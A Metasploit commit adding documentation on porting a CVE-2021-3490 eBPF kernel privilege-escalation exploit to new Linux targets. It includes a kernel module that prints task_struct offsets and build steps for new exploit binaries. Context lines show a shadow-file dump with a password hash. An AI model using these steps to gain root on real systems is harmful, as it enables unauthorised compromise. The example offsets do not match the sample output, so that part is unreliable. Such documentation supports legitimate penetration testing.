Add in Manfred Paul's original blog post and chompie1337's original PoC to the list of links. Also add in a relatively detailed description of how to add in new targets to this exploit to the documentation in case that helps anyone down the line

2024-09-04 20:18:27 +02:00 · 2021-08-25 18:09:07 -05:00 · 2021-08-25 18:09:07 -05:00 · 6f9b06fb4b
commit 6f9b06fb4b
parent 29a230ec72
2 changed files with 93 additions and 1 deletions
--- a/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
+++ b/documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
@ -23,6 +23,96 @@ Ubuntu 20.10 (Groovy Gorilla) 5.8.x kernels prior to 5.8.0-53.60
 Ubuntu 21.04 (Hirsute Hippo) 5.11.x kernels prior to 5.11.0-17.18
 Fedora kernel versions 5.x from 5.7.x up to but not including 5.11.20-300.

+#### Adding New Targets
+Credits for the following code go to Robert whose code I took from
+https://blog.sourcerer.io/writing-a-simple-linux-kernel-module-d9dc3762c234.
+
+Save this in a file named `lkm_example.c`
+
+```
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/sched.h>
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Robert W. Oliver II");
+MODULE_DESCRIPTION("A simple example Linux module.");
+MODULE_VERSION("0.01");
+static int __init lkm_example_init(void) {
+ printk(KERN_INFO "cred offset: %lu\n", offsetof(struct task_struct, cred));
+ return 0;
+}
+static void __exit lkm_example_exit(void) {
+ printk(KERN_INFO "pid_links offset: %lu\n", offsetof(struct task_struct, pid_links));
+}
+module_init(lkm_example_init);
+module_exit(lkm_example_exit);
+```
+
+In the same folder make a file named `Makefile` and paste this code into it:
+
+```
+obj-m += lkm_example.o
+all:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+clean:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+```
+
+Then run the following:
+
+```
+sudo apt-get install build-essential linux-headers-`uname -r`
+make && sudo insmod lkm_example.ko && sudo rmmod lkm_example && sudo dmesg
+```
+
+Then find the output from the last two lines. It should look something like this:
+
+```
+[40219.507922] cred offset: 2776
+[40219.519139] pid_links offset: 2440
+```
+
+Update `external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490/Makefile` and add in a new line
+like so, replacing `FEDORA_KERNEL_5_10` with whatever name you prefer.
+
+```
+FEDORA_KERNEL_5_10:
+	$(CC) -DFEDORA_KERNEL_5_10 $(CMP)
+```
+
+Update `external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490/include/kernel_defs.h` and include
+the following two lines, replacing `FEDORA_KERNEL_5_10` with the name you used in the step above.
+
+```
+#ifdef FEDORA_KERNEL_5_10
+#define TASK_LIST_OFFSET 0x948
+#endif
+....
+#ifdef FEDORA_KERNEL_5_10
+#define TASK_CRED_OFFSET 0xAD0
+#endif
+```
+
+The first number above should correspond to the number returned after `pid_links offset`, and the second number should
+be the number after the text `cred offset:`.
+
+Additionally if you are adding a kernel prior to 5.11.x to the targets, update the following line
+and add `|| defined(<the name you used in earlier steps>)` to the end of it.
+
+```
+#if defined(GROOVY) || defined(FEDORA_KERNEL_5_7) || defined(FEDORA_KERNEL_5_8) || defined(FEDORA_KERNEL_5_9) || defined(FEDORA_KERNEL_5_10)
+    uint64_t kref; /* From Linux kernel 5.11 this field was removed, however it is present in all previous versions.
+                    See https://elixir.bootlin.com/linux/v5.11-rc1/source/include/linux/pid_namespace.h and
+                    https://elixir.bootlin.com/linux/v5.10.60/source/include/linux/pid_namespace.h for a comparison */
+```
+
+Run `make`. If all goes well you should get a new binary at `bin/exploit.bin`. Move
+this to `data/exploits/cve-2021-3490/<target name and kernel version here>.bin`.
+
+Finally open up `modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb` so that
+it calls `upload_and_chmodx` for the new binary in the right situations.
+
 ## Verification Steps

  1. Start `msfconsole`
@ -957,4 +1047,4 @@ sshd:!!:18740::::::
 tcpdump:!!:18740::::::
 test:$6$ljo05fNdlEN6MXS$wKC5TeBRRD8W3LYglBpXV3ydvvK5348cTO0T65haiZ9utDVJCdMD9vJoKr.w0OeHKSr4FahUv/CUIsFcdQqUT/:18862:0:99999:7:::
 meterpreter >
-```
+```
--- a/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
+++ b/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb
@ -54,6 +54,8 @@ class MetasploitModule < Msf::Exploit::Local
          [
            [ 'CVE', '2021-3490' ],
            [ 'URL', 'https://www.openwall.com/lists/oss-security/2021/05/11/11' ],
+            [ 'URL', 'https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490' ], # Original PoC
+            [ 'URL', 'https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification' ], # Discussess the techniques used to gain arbitrary R/W in kernel.
            [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e' ],
            [ 'URL', 'https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story' ],
            [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-606/' ],